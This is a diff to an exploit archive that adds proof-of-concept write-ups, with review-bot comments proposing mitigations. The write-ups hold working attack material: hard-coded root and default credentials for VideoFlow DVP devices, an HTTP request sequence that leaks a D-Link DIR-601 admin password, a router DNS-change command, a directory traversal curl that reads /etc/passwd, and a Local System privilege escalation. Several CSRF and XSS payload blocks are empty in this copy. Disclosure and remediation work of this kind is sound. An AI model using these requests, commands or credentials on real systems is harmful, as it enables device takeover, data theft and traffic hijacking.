diff --git a/exploits/hardware/webapps/44387.txt b/exploits/hardware/webapps/44387.txt
new file mode 100644
index 000000000..873d578bf
--- /dev/null
+++ b/exploits/hardware/webapps/44387.txt
@@ -0,0 +1,91 @@
+VideoFlow Digital Video Protection DVP 10 Authenticated Root Remote Code Execution
+
+Vendor: VideoFlow Ltd.
+Product web page: http://www.video-flow.com
+Affected version: 2.10 (X-Prototype-Version: 1.6.0.2)
+
+System = Indicate if the DVP is configured as Protector, Sentinel or Fortress
+Version = The Operating System SW version number
+Image version = Production Image version
+
+ System: DVP Protector
+ Version: 1.40.0.15(R) May 5 2015 05:27:05
+ Image version: 3.07i
+
+ System: DVP Protector
+ Version: 1.40.0.15(R) May 5 2015 05:27:05
+ Image version: 2.08
+
+ System: DVP Fortress
+ Version: 2.10.0.5(R) Jan 7 2018 03:26:35
+ Image version: 3.07
+
+
+Summary: VideoFlow's Digital Video Protection (DVP) product is used by
+leading companies worldwide to boost the reliability of IP networks, including
+the public Internet, for professional live broadcast. DVP enables broadcast
+companies to confidently contribute and distribute live video over IP with
+unprecedented levels of service continuity, at a fraction of the cost of
+leased lines or satellite links. It accelerates ROI by reducing operational
+costs and enabling new revenue streams across a wide variety of markets.
+
+Desc: The affected device suffers from authenticated remote code execution
+vulnerability. Including a CSRF, a remote attacker can exploit this issue
+and execute arbitrary system commands granting her system access with root
+privileges.
+
+Tested on: CentOS release 5.6 (Final) (2.6.18-238.12.1.el5)
+ CentOS release 5.10 (Final) (2.6.18-371.el5)
+ ConfD
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2018-5455
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5455.php
+
+01.02.2018
+
+---
+
+
+Default credentials (web management):
+
+admin:admin
+oper:oper
+private:private
+public:public
+devel:devel
+
+
+Hard-Coded credentials (ssh):
+
+root:videoflow
+mom:$1$CGgdGXXG$0FmyyKMzcHgkKnUTZi5r./
+
+
+-------------------------------- > Tools > System > Shell > --------------------------------
+| |
+| sh-3.2# id;pwd;uname -a;ls |
+| uid=0(root) gid=0(root) |
+| /dvp100/confd |
+| Linux localhost.localdomain 2.6.18-371.el5 #1 SMP Tue Oct 1 08:37:57 EDT 2013 i6 |
+| 86 i686 i386 GNU/Linux |
+| aaa_cdb.fxs ietf-inet-types.fxs SNMP-USER-BASED-SM-MIB.fxs |
+| authorization.fxs ietf-yang-types.fxs SNMPv2-MIB.fxs |
+| browser.log IF-MIB.bin SNMPv2-SMI.fxs |
+| community_init.xml IF-MIB.fxs SNMPv2-TC.fxs |
+| confd.conf IPV6-TC.fxs SNMP-VIEW-BASED-ACM-MIB.fxs |
+| config.web Makefile TRANSPORT-ADDRESS-MIB.fxs |
+| docroot SNMP-COMMUNITY-MIB.fxs users.fxs |
+| dvp.fxs SNMP-FRAMEWORK-MIB.fxs vacm_init.xml |
+| dvp_init.xml SNMP-MPD-MIB.fxs webspec.dat |
+| IANAifType-MIB.bin SNMP-NOTIFICATION-MIB.fxs |
+| IANAifType-MIB.fxs SNMP-TARGET-MIB.fxs |
+| sh-3.2# cat /etc/issue |
+| CentOS release 5.10 (Final) |
+| Kernel \r on an \m |
+| |
+--------------------------------------------------------------------------------------------
\ No newline at end of file
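Review bot: The title on the first line calls this an authenticated root remote code execution, while the index row this commit adds for 44387 in files_exploits.csv describes it as "Hard-Coded Credentials"; one of the two should change so that a search by vulnerability class finds the entry. The Desc paragraph also mentions CSRF without saying which request lacks a token. The file ends without any remediation, so I would add a closing section such as `Mitigation: change every default web account, restrict the web management interface and SSH to a management network, and ask the vendor for an image without the fixed SSH accounts.`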
diff --git a/exploits/hardware/webapps/44388.txt b/exploits/hardware/webapps/44388.txt
new file mode 100644
index 000000000..5a67c8504
--- /dev/null
+++ b/exploits/hardware/webapps/44388.txt
@@ -0,0 +1,179 @@
+# Exploit Title: DLink DIR-601 Unauthenticated Admin password disclosure
+# Google Dork: N/A
+# Date: 12/24/2017
+# Exploit Author: Kevin Randall
+# Vendor Homepage: https://www.dlink.com
+# Software Link: N/A
+# Version: Firmware: 2.02NA Hardware Version B1
+# Tested on: Windows 10 + Mozilla Firefox
+# CVE : CVE-2018-5708
+
+*Been in contact with William Brown CISO of Dlink and disclosed to the vendor*
+
+1. Description
+
+Having local access to the network but being unauthenticated to the administrator panel, a user can disclose the built in Admin username/password to access the admin panel
+
+
+2. Proof of Concept
+(For proof of concept, the real Admin password is "thisisatest"
+Step 1: Access default gateway/router login page
+
+Step 2: Login with Username Admin and put any random password: (This example the password is test)
+
+POST /my_cgi.cgi?0.06201226210472943 HTTP/1.1
+Host: 192.168.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:57.0) Gecko/20100101 Firefox/57.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Referer: http://192.168.0.1/login_real.htm
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 74
+DNT: 1
+Connection: close
+
+request=login&admin_user_name=YWRtaW4A&admin_user_pwd=dGVzdA==&user_type=0
+
+Step 3: Clear Password that was set:
+
+POST /my_cgi.cgi?0.06201226210472943 HTTP/1.1
+Host: 192.168.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:57.0) Gecko/20100101 Firefox/57.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Referer: http://192.168.0.1/login_real.htm
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 74
+DNT: 1
+Connection: close
+
+request=login&admin_user_name=YWRtaW4A&admin_user_pwd=&user_type=0
+
+
+Step 4: The following POST request will come back or a variant:
+
+POST /my_cgi.cgi?0.322727424911867 HTTP/1.1
+Host: 192.168.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:57.0) Gecko/20100101 Firefox/57.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Referer: http://192.168.0.1/back.htm
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 73
+DNT: 1
+Connection: close
+
+request=no_auth&request=load_settings&table_name=fw_ver&table_name=hw_ver
+
+Change the request=no_auth to "request=auth"
+
+
+POST /my_cgi.cgi?0.322727424911867 HTTP/1.1
+Host: 192.168.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:57.0) Gecko/20100101 Firefox/57.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Referer: http://192.168.0.1/back.htm
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 73
+DNT: 1
+Connection: close
+
+request=auth&request=load_settings&table_name=fw_ver&table_name=hw_ver
+
+Step 5: Forward the request:
+
+
+
+Step 6: Forward the following request:
+
+POST /my_cgi.cgi?0.8141419425197141 HTTP/1.1
+Host: 192.168.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:57.0) Gecko/20100101 Firefox/57.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Referer: http://192.168.0.1/back.htm
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 20
+DNT: 1
+Connection: close
+
+request=show_message
+
+
+Step 7: You will then be presented with the following: "Invalid user name or password, please try again"
+
+Step 8: Click Continue
+
+
+
+Step 9: You will see a POST request come back similar to the following:
+
+POST /my_cgi.cgi?0.12979015154204587 HTTP/1.1
+Host: 192.168.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:57.0) Gecko/20100101 Firefox/57.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Referer: http://192.168.0.1/login.htm
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 68
+DNT: 1
+Connection: close
+
+request=no_auth&request=load_settings&table_name=get_restore_default
+
+Step 10: Change the parameters "request=no_auth" to "request=auth" and "table_name=get_restore_default" to "table_name=restore_default"
+
+POST /my_cgi.cgi?0.12979015154204587 HTTP/1.1
+Host: 192.168.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:57.0) Gecko/20100101 Firefox/57.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Referer: http://192.168.0.1/login.htm
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 68
+DNT: 1
+Connection: close
+
+request=auth&request=load_settings&table_name=restore_default
+
+
+Step 11: Forward the request:
+
+Step 12: You will see the following POST request come back or a variant of it:
+
+POST /my_cgi.cgi?0.5566044428265032 HTTP/1.1
+Host: 192.168.0.1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:57.0) Gecko/20100101 Firefox/57.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Referer: http://192.168.0.1/wizard_default.htm
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 278
+DNT: 1
+Connection: close
+
+request=no_auth&request=load_settings&table_name=get_restore_default&table_name=wan_settings&table_name=wan_static&table_name=wan_pppoe&table_name=wan_pptp&table_name=wan_l2tp&table_name=wireless_settings&table_name=admin_user&table_name=time&table_name=fw_ver&table_name=hw_ver
+
+
+Step 13: In BurpSuite, right click on the POST request and choose: "Do Intercept" "Response from this request":
+
+
+Step 14: In XML cleartext, configuration information is obtained including the Admin username and password "thisisatest"
+
+
+HTTP/1.1 200 OK
+Content-type: text/xml
+Connection: close
+Date: Sat, 06 Jan 2018 13:33:26 GMT
+Server: lighttpd/1.4.28
+Content-Length: 2414
+
+0044:8a:5b:8d:ba:1310.0.0.00.0.0.00.0.0.0150000.0.0.0on_demand300149200.0.0.00.0.0.00.0.0.0on_demand300140000.0.0.00.0.0.00.0.0.0on_demand30014001AlwaysHomeAP3011gn01adminthisisatest12.02NA01Tue, 11 Nov 2014NAB1
+
+
+
+
+
+3. Solution:
+N/A. Unknown as of the moment
\ No newline at end of file
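Review bot: Section 1 says what is disclosed but not why. In steps 4 and 10 the only edit is rewriting `request=no_auth` to `request=auth`, which suggests my_cgi.cgi takes the authentication state from a client-supplied parameter rather than from a server-side session; I would state that in the Description, hedged as an inference from the captured traffic. Section 3 offers no guidance at all, so an interim line would help, e.g. `Mitigation: limit access to the router's web interface to trusted hosts, keep remote management disabled, and change the admin password once fixed firmware is installed.` The response body in step 14 has lost its XML tags in this copy, so the field boundaries cannot be read, and the parenthesis opened on the "For proof of concept" line is never closed.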
diff --git a/exploits/hardware/webapps/44393.sh b/exploits/hardware/webapps/44393.sh
new file mode 100755
index 000000000..22f446a6e
--- /dev/null
+++ b/exploits/hardware/webapps/44393.sh
@@ -0,0 +1,62 @@
+#
+#
+# Secutech RiS-11/RiS-22/RiS-33 V5.07.52_es_FRI01
+# Remote DNS Change PoC
+#
+# Copyright 2018 (c) Todor Donev
+# https://ethical-hacker.org/
+# https://facebook.com/ethicalhackerorg
+#
+#
+# Once modified, systems use foreign DNS servers, which are
+# usually set up by cybercriminals. Users with vulnerable
+# systems or devices who try to access certain sites are
+# instead redirected to possibly malicious sites.
+#
+# Modifying systems' DNS settings allows cybercriminals to
+# perform malicious activities like:
+#
+# o Steering unknowing users to bad sites:
+# These sites can be phishing pages that
+# spoof well-known sites in order to
+# trick users into handing out sensitive
+# information.
+#
+# o Replacing ads on legitimate sites:
+# Visiting certain sites can serve users
+# with infected systems a different set
+# of ads from those whose systems are
+# not infected.
+#
+# o Controlling and redirecting network traffic:
+# Users of infected systems may not be granted
+# access to download important OS and software
+# updates from vendors like Microsoft and from
+# their respective security vendors.
+#
+# o Pushing additional malware:
+# Infected systems are more prone to other
+# malware infections (e.g., FAKEAV infection).
+#
+# Disclaimer:
+# This or previous programs is for Educational
+# purpose ONLY. Do not use it without permission.
+# The usual disclaimer applies, especially the
+# fact that Todor Donev is not liable for any
+# damages caused by direct or indirect use of the
+# information or functionality provided by these
+# programs. The author or any Internet provider
+# bears NO responsibility for content or misuse
+# of these programs or any derivatives thereof.
+# By using these programs you accept the fact
+# that any damage (dataloss, system crash,
+# system compromise, etc.) caused by the use
+# of these programs is not Todor Donev's
+# responsibility.
+#
+# Use them at your own risk!
+#
+#
+
+
+GET -H "Cookie: admin:language=en; path=/" "http:///goform/AdvSetDns?GO=wan_dns.asp&rebootTag=&DSEN=1&DNSEN=on&DS1=&DS2=" 2>/dev/null
\ No newline at end of file
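Review bot: The header comment spends about forty lines on the consequences of a DNS change and on the disclaimer, but never states the flaw itself. From the command on the last line, the only credential sent is the fixed cookie `admin:language=en`, so presumably /goform/AdvSetDns accepts the change without a login session; that belongs in one comment line, hedged if it has not been verified. A defender reading the file also needs a remediation line, for example `# Mitigation: disable WAN-side management, update the firmware, and verify the router's configured DNS servers.` The file is added with mode 100755 but has no interpreter line, and `GET` is presumably the lwp-request alias rather than a shell builtin, which deserves a comment as well.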
diff --git a/exploits/perl/webapps/44386.txt b/exploits/perl/webapps/44386.txt
new file mode 100644
index 000000000..e7849be95
--- /dev/null
+++ b/exploits/perl/webapps/44386.txt
@@ -0,0 +1,108 @@
+VideoFlow Digital Video Protection DVP 10 Authenticated Directory Traversal
+
+Vendor: VideoFlow Ltd.
+Product web page: http://www.video-flow.com
+Affected version: 2.10 (X-Prototype-Version: 1.6.0.2)
+
+System = Indicate if the DVP is configured as Protector, Sentinel or Fortress
+Version = The Operating System SW version number
+Image version = Production Image version
+
+ System: DVP Protector
+ Version: 1.40.0.15(R) May 5 2015 05:27:05
+ Image version: 3.07i
+
+ System: DVP Protector
+ Version: 1.40.0.15(R) May 5 2015 05:27:05
+ Image version: 2.08
+
+ System: DVP Fortress
+ Version: 2.10.0.5(R) Jan 7 2018 03:26:35
+ Image version: 3.07
+
+
+Summary: VideoFlow's Digital Video Protection (DVP) product is used by
+leading companies worldwide to boost the reliability of IP networks, including
+the public Internet, for professional live broadcast. DVP enables broadcast
+companies to confidently contribute and distribute live video over IP with
+unprecedented levels of service continuity, at a fraction of the cost of
+leased lines or satellite links. It accelerates ROI by reducing operational
+costs and enabling new revenue streams across a wide variety of markets.
+
+Desc: The application suffers from an authenticated arbitrary file disclosure
+vulnerability including no session expiration. Input passed via the 'ID' parameter
+in several Perl scripts is not properly verified before being used to download
+system files. This can be exploited to disclose the contents of arbitrary
+files via directory traversal attacks.
+
+Scripts affected:
+
+$ grep -rnH "Content-Disposition" .
+./download.pl:30: print "Content-Disposition:attachment;filename=$ID\n\n";
+./download_xml.pl:23: print "Content-Disposition:attachment;filename=$ID\n\n";
+./downloadmib.pl:22: print "Content-Disposition:attachment;filename=$ID\n\n";
+./downloadFile.pl:30: print "Content-Disposition:attachment;filename=$OUTNAME\n\n";
+./downloadsys.pl:22: print "Content-Disposition:attachment;filename=$ID\n\n";
+
+----------------------------------------------------------------------------
+/dvp100/confd/docroot/cgi-bin/downloadsys.pl:
+---------------------------------------------
+
+ 1 #!/usr/bin/perl -wT
+ 2 # http://www.sitepoint.com/file-download-script-perl/
+ 3
+ 4 use strict;
+ 5 use CGI;
+ 6 use CGI::Carp qw ( fatalsToBrowser );
+ 7 my $files_location;
+ 8 my $query = CGI->new;
+ 9 my $ID = $query->param('ID');
+ 10 my @fileholder;
+ 11
+ 12 $files_location = "/dvp100/confd/docroot/cgi-bin/";
+ 13 #$ID = "syslog.tar.gz"; #param('ID');
+ 14
+ 15 if ($ID eq '') {
+ 16
+ 17 } else {
+ 18 open(DLFILE, "<$files_location/$ID") || Error('open', 'file');
+ 19 @fileholder = ;
+ 20 close (DLFILE) || Error ('close', 'file');
+ 21 print "Content-Type:application/x-download\n";
+ 22 print "Content-Disposition:attachment;filename=$ID\n\n";
+ 23 print @fileholder;
+ 24 }
+
+----------------------------------------------------------------------------
+
+Tested on: CentOS release 5.6 (Final) (2.6.18-238.12.1.el5)
+ CentOS release 5.10 (Final) (2.6.18-371.el5)
+ ConfD
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2018-5454
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5454.php
+
+01.02.2018
+
+---
+
+
+curl 'http://17.17.17.17/cgi-bin/downloadsys.pl?ID=../../../../etc/passwd' -H Cookie:sessionid=sess3638473331458218
+root:x:0:0:root:/root:/bin/bash
+bin:x:1:1:bin:/bin:/sbin/nologin
+daemon:x:2:2:daemon:/sbin:/sbin/nologin
+adm:x:3:4:adm:/var/adm:/sbin/nologin
+lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
+sync:x:5:0:sync:/sbin:/bin/sync
+shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
+halt:x:7:0:halt:/sbin:/sbin/halt
+mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
+news:x:9:13:news:/etc/news:
+uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
+...
+...
\ No newline at end of file
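Review bot: The advisory has no Solution section even though the quoted downloadsys.pl shows the cause: `$ID` from the query is concatenated into the path of the two-argument `open` on listing line 18 and echoed into the Content-Disposition header on listing line 22. I would add remediation text along the lines of `Fix: accept only a bare file name for ID (reject "/" and ".."), confirm the resolved path stays under $files_location, and use three-argument open.` It is worth adding that the `-T` switch on the first listing line does not help here, because Perl's taint mode does not check file names opened for reading. Listing line 19 reads `@fileholder = ;`, which looks like the filehandle read was lost in extraction. The grep output names four other scripts with the same header pattern; whether they share the path handling is not shown.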
diff --git a/exploits/php/webapps/44383.html b/exploits/php/webapps/44383.html
new file mode 100644
index 000000000..3c9fd6bd2
--- /dev/null
+++ b/exploits/php/webapps/44383.html
@@ -0,0 +1,58 @@
+# Exploit Title: Cross Site Request Forgery- Frog CMS
+# Date: 31-03-2018
+# Exploit Author: Samrat Das
+# Contact: http://twitter.com/Samrat_Das93
+# Website: https://securitywarrior9.blogspot.in/
+# Vendor Homepage: https://github.com/philippe/FrogCMS
+# Version: 0.9.5
+# CVE : CVE-2018-8908
+# Category: Webapp CMS
+
+
+1. Description
+
+The application source code is coded in a way which allows malicious HTML
+request to be executed without veryifying source of request.This leads to
+arbitary execution with malicous request which will lead to the creation of
+a privileged user.
+
+2. Proof of Concept
+
+ Visit the application
+ Visit the Add Users Page.
+ Craft an html page with all the details for an admin user creation
+and host it on a server
+ Upon the link being clicked by a logged in admin user, immidiately,
+another admin user will get created.
+
+Exploit Code:
+
+
+
+
+
+
+
+
+3. Solution:
+
+Solution - Fix & Patch: The application code should be configured to
+implement anti csrf token to filter malicous HTTP Requests.
+
+
+4. Public Reference with POC and steps:
+
+http://securitywarrior9.blogspot.in/2018/03/cross-site-request-forgery-frog-cms-cve.html
+
+Thanks and Regards
+Samrat
\ No newline at end of file
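Review bot: The Solution in section 3 says only to "implement anti csrf token", which omits what makes such a token effective. I would spell it out as `Fix: require an unpredictable per-session token on the add-user form, validate it server-side on every state-changing POST, and set SameSite on the session cookie.` The "Exploit Code:" block is empty in this copy, so the form fields that the description refers to cannot be checked against the text. Several words in section 1 are misspelled ("veryifying", "arbitary", "malicous").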
diff --git a/exploits/php/webapps/44384.txt b/exploits/php/webapps/44384.txt
new file mode 100644
index 000000000..06c4e0cd7
--- /dev/null
+++ b/exploits/php/webapps/44384.txt
@@ -0,0 +1,51 @@
+ # Exploit Title: WampServer 3.1.1 XSS via CSRF
+# Date: 31-03-2018
+# Software Link: http://www.wampserver.com/en/
+# Version: 3.1.1
+# Tested On: Windows 10
+# Exploit Author: Vipin Chaudhary
+# Contact: http://twitter.com/vipinxsec
+# Website: http://medium.com/@vipinxsec
+# CVE: CVE-2018-8732
+
+
+1. Description
+
+XSS: cross site scripting via CSRF is remotely exploitable.
+http://forum.wampserver.com/read.php?2,138295,150615,page=6#msg-150615
+
+http://forum.wampserver.com/read.php?2,150617
+
+2. Proof of Concept
+
+
+How to exploit this XSS vulnerability:
+1. Go to Add a Virtual host and add one to wampserver.
+2. Go to Supress Virtual host and select one to delete and then intercept
+the request using burp suite or any other proxy tool
+3. Change the value of parameter *virtual_del[] *to "> and forward it then you will see the XSS triggered.
+
+How to see it:
+1. Copy and paste this CSRF request in notepad and save it as anything.html
+
+
+
+
+
+
+Warning: action="[localhost] is action='
+http://localhost/add_vhost.php?lang=english' replacing simple quotes(') by
+double quote("[image: winking smiley]
+
+
+3. Solution:
+
+Update to version 3.1.3
+http://www.wampserver.com/en/#download-wrapper
\ No newline at end of file
diff --git a/exploits/php/webapps/44385.html b/exploits/php/webapps/44385.html
new file mode 100644
index 000000000..defe8a9ab
--- /dev/null
+++ b/exploits/php/webapps/44385.html
@@ -0,0 +1,47 @@
+# Exploit Title: WampServer 3.1.2 CSRF to add or delete any virtual hostsremotely
+# Date: 31-03-2018
+# Software Link: http://www.wampserver.com/en/
+# Version: 3.1.2
+# Tested On: Windows 10
+# Exploit Author: Vipin Chaudhary
+# Contact: http://twitter.com/vipinxsec
+# Website: http://medium.com/@vipinxsec
+# CVE: CVE-2018-8817
+
+
+1. Description
+
+CSRF (Cross site request forgery) in WampServer 3.1.2 which allows a remote
+attacker to force any victim to add or delete virtual hosts.
+
+http://forum.wampserver.com/read.php?2,138295,150722,page=6#msg-150722
+
+2. Proof of Concept
+
+How to exploit this CSRF vulnerability:
+1. Go to Add a Virtual host and add one to wampserver.
+2. Now intercept the request with proxy tool like burp suite.
+3. Now make a CSRF PoC of the request and to exploit you can host it on
+internet and send the link to the victim.
+
+*Exploit Code for deleting any host remotely:*
+
+1. Copy and paste this CSRF request in notepad and save it as anything.html
+
+
+
+
+
+
+2. Then run it on your installed vulnerable wampserver.
+
+3. Solution:
+
+Update to version 3.1.3
+http://www.wampserver.com/en/#download-wrapper
\ No newline at end of file
diff --git a/exploits/php/webapps/44391.html b/exploits/php/webapps/44391.html
new file mode 100644
index 000000000..5fc09a7f5
--- /dev/null
+++ b/exploits/php/webapps/44391.html
@@ -0,0 +1,73 @@
+# Exploit Title: OpenCMS 10.5.3 Multiple Cross Site Request Forgery Vulnerabilities
+Injection
+# Google Dork: N/A
+# Date: 02-04-2018
+#######################################
+# Exploit Author: Sureshbabu Narvaneni
+# Author Blog : http://nullnews.in
+# Vendor Homepage: http://www.opencms.org/en/
+# Software Link: http://www.opencms.org/en/modules/downloads/begindownload.html?id=a7747cd0-b27b-11e7-8299-7fde8b0295e1
+# Affected Version: 10.5.3
+# Category: WebApps
+# Tested on: Ubuntu 14.04 x86_64/Kali Linux 4.12 i686
+# CVE : CVE-2018-8811
+
+1. Vendor Description:
+
+OpenCms from Alkacon Software is a professional, easy to use website content management system. OpenCms helps content managers worldwide to create and maintain beautiful websites fast and efficiently.
+
+2. Technical Description:
+
+Cross-site request forgery (CSRF) vulnerability in system/workplace/admin/accounts/user_role.jsp in OpenCMS 10.5.3 allows remote attackers to hijack the authentication of administrative users for requests that perform privilege escalation.
+
+3. Proof Of Concept:
+
+a) Send below crafted request to logged in user who is having Root Administrator level access.
+
+
+
+
+
+
+
+
+b) Once the logged in user opens the URL the form will get submitted with active session of root administrator and action get performed successfully.
+
+c) By leveraging this vulnerability user can gain Root Level Administrator Access to the CMS.
+
+
+4. Solution:
+
+Upgrade to latest release.
+http://www.opencms.org/en/home/news.html
+
+5. Reference:
+https://github.com/alkacon/opencms-core/issues/586
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-8811
\ No newline at end of file
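Review bot: The reference URL on the last line, `cvename.cgi?name=2018-8811`, drops the `CVE-` prefix that the header field uses; I would write the full identifier, `name=CVE-2018-8811`, and 44392.txt has the same slip with `name=2018-8815`. The title is also broken across two lines, leaving a stray `Injection` without a leading `#` on the second line. Section 4 says "Upgrade to latest release" without naming the first fixed version, which a reader cannot act on; the linked issue 586 is presumably where that version is recorded.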
diff --git a/exploits/php/webapps/44392.txt b/exploits/php/webapps/44392.txt
new file mode 100644
index 000000000..449624ad2
--- /dev/null
+++ b/exploits/php/webapps/44392.txt
@@ -0,0 +1,51 @@
+# Exploit Title: OpenCMS 10.5.3 Stored Cross Site Scripting Vulnerability
+# Google Dork: N/A
+# Date: 02-04-2018
+#######################################
+# Exploit Author: Sureshbabu Narvaneni
+# Author Blog : http://nullnews.in
+# Vendor Homepage: http://www.opencms.org/en/
+# Software Link: http://www.opencms.org/en/modules/downloads/begindownload.html?id=a7747cd0-b27b-11e7-8299-7fde8b0295e1
+# Affected Version: 10.5.3
+# Category: WebApps
+# Tested on: Ubuntu 14.04 x86_64/Kali Linux 4.12 i686
+# CVE : CVE-2018-8815
+
+1. Vendor Description:
+
+OpenCms from Alkacon Software is a professional, easy to use website
+content management system. OpenCms helps content managers worldwide to
+create and maintain beautiful websites fast and efficiently.
+
+2. Technical Description:
+
+Cross-site scripting (XSS) vulnerability in the gallery function in Alkacon
+OpenCMS 10.5.3 allows remote attackers to inject arbitrary web script or
+HTML via a malicious SVG image.
+
+3. Proof Of Concept:
+
+a) Login as user who is having Gallery Editor role.
+b) Navigate to gallery and upload below svg file.
+
+
+
+
+c) Once other user who is having Root Administrator permissions visited the
+image link or viewed the uploaded svg image the script get executed.
+
+4. Solution:
+
+Upgrade to latest release.
+http://www.opencms.org/en/home/news.html
+
+5. Reference:
+https://github.com/alkacon/opencms-core/issues/587
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=2018-8815
\ No newline at end of file
diff --git a/exploits/windows/local/44382.py b/exploits/windows/local/44382.py
index 64a4dc85a..b026006a7 100755
--- a/exploits/windows/local/44382.py
+++ b/exploits/windows/local/44382.py
@@ -16,7 +16,6 @@ After hitting enter new device, click Enter device manually
#!/usr/bin/python
import socket
-# Create an array of buffers, from 1 to 5900, with increments of 200.
calc = ("\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b"
"\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
diff --git a/exploits/windows/local/44389.txt b/exploits/windows/local/44389.txt
new file mode 100644
index 000000000..5985915f7
--- /dev/null
+++ b/exploits/windows/local/44389.txt
@@ -0,0 +1,49 @@
+Exploit Author: bzyo
+Twitter: @bzyo_
+Exploit Title: WebLog Expert Enterprise 9.4 - Privilege Escalation
+Date: 03-31-2018
+Vulnerable Software: WebLog Expert Enterprise 9.4
+Vendor Homepage: https://www.weblogexpert.com/
+Version: 9.4
+Software Link: https://www.weblogexpert.com/download.htm
+Tested On: Windows 7 x86 and x64
+
+
+Details:
+By default WebLog Expert Enterprise 9.4 runs scheduled tasks under Local System account.
+If WebLog Expert Schedule Service is installed by an administrator, regular users have the
+ability to run tasks as Local System.
+
+
+Exploit:
+1. Login as regular user where WebLog Expert and WebLog Expert Schedule Service are installed
+
+2. Open WebLog Expert and then Schedule
+
+3. Select Add, Next, choose 'Sample - HTML' under Profile, Next
+
+4. Check 'Run command...' box, fill in 'Command' and 'Run in' as listed below
+ Command: C:\Windows\System32\cmd.exe
+ Run in: C:\Windows\System32\
+
+5. Select Next, Finish, Highlight New Task, select Run Now
+
+6. Pop-up will appear in taskbar that reads 'A program running on this computer is trying to display a message'
+
+7. Select 'View the message'
+
+8. Command prompt is shown
+ C:\Windows\system32>whoami
+ nt authority\system
+
+Prerequisites:
+To successfully exploit this vulnerability, an attacker must already have access
+to a system running WebLog Expert and WebLog Expert Schedule Service using a
+low-privileged user account
+
+Risk:
+The vulnerability allows local attackers to escalate privileges and execute
+arbitrary code as Local System aka Game Over.
+
+Fix:
+Under Schedule Options, change default account that runs scheduled tasks
\ No newline at end of file
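Review bot: The Fix line says to change the default account under Schedule Options but not what to change it to, and it does not address who may create tasks. I would make it `Fix: under Schedule Options, run scheduled tasks as a dedicated low-privileged account rather than Local System, and limit which users can add or edit tasks.` The second half applies only if the product exposes such a control, which the text does not show.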
diff --git a/files_exploits.csv b/files_exploits.csv
index c88125e92..6091a6dfd 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -9626,6 +9626,7 @@ id,file,description,date,author,type,platform,port
44364,exploits/windows/local/44364.py,"Allok Video Joiner 4.6.1217 - Stack-Based Buffer Overflow",2018-03-30,"Mohan Ravichandran and Velayutham Selvaraj",local,windows,
44365,exploits/windows/local/44365.py,"Allok WMV to AVI MPEG DVD WMV Converter 4.6.1217 - Buffer Overflow",2018-03-30,"Mohan Ravichandran and Velayutham Selvaraj",local,windows,
44382,exploits/windows/local/44382.py,"Faleemi Windows Desktop Software - (DDNS/IP) Local Buffer Overflow",2018-03-30,"Himavanth Reddy",local,windows,
+44389,exploits/windows/local/44389.txt,"WebLog Expert Enterprise 9.4 - Privilege Escalation",2018-04-02,bzyo,local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -39079,6 +39080,15 @@ id,file,description,date,author,type,platform,port
44374,exploits/php/webapps/44374.py,"osCommerce 2.3.4.1 - Remote Code Execution",2018-03-30,"Simon Scannell",webapps,php,
44377,exploits/asp/webapps/44377.txt,"Tenda W316R Wireless Router 5.07.50 - Remote DNS Change",2018-03-30,"Todor Donev",webapps,asp,
44378,exploits/php/webapps/44378.txt,"D-Link DIR-850L Wireless AC1200 Dual Band Gigabit Cloud Router - Authentication Bypass",2018-03-30,"Gem George",webapps,php,
-44381,exploits/asp/webapps/44381.txt,"Tenda FH303/A300 Firmware V5.07.68_EN - Remote DNS Change",2018-03-30,"Todor Donev",webapps,asp,
+44381,exploits/asp/webapps/44381.txt,"Tenda FH303/A300 Firmware v5.07.68_EN - Remote DNS Change",2018-03-30,"Todor Donev",webapps,asp,
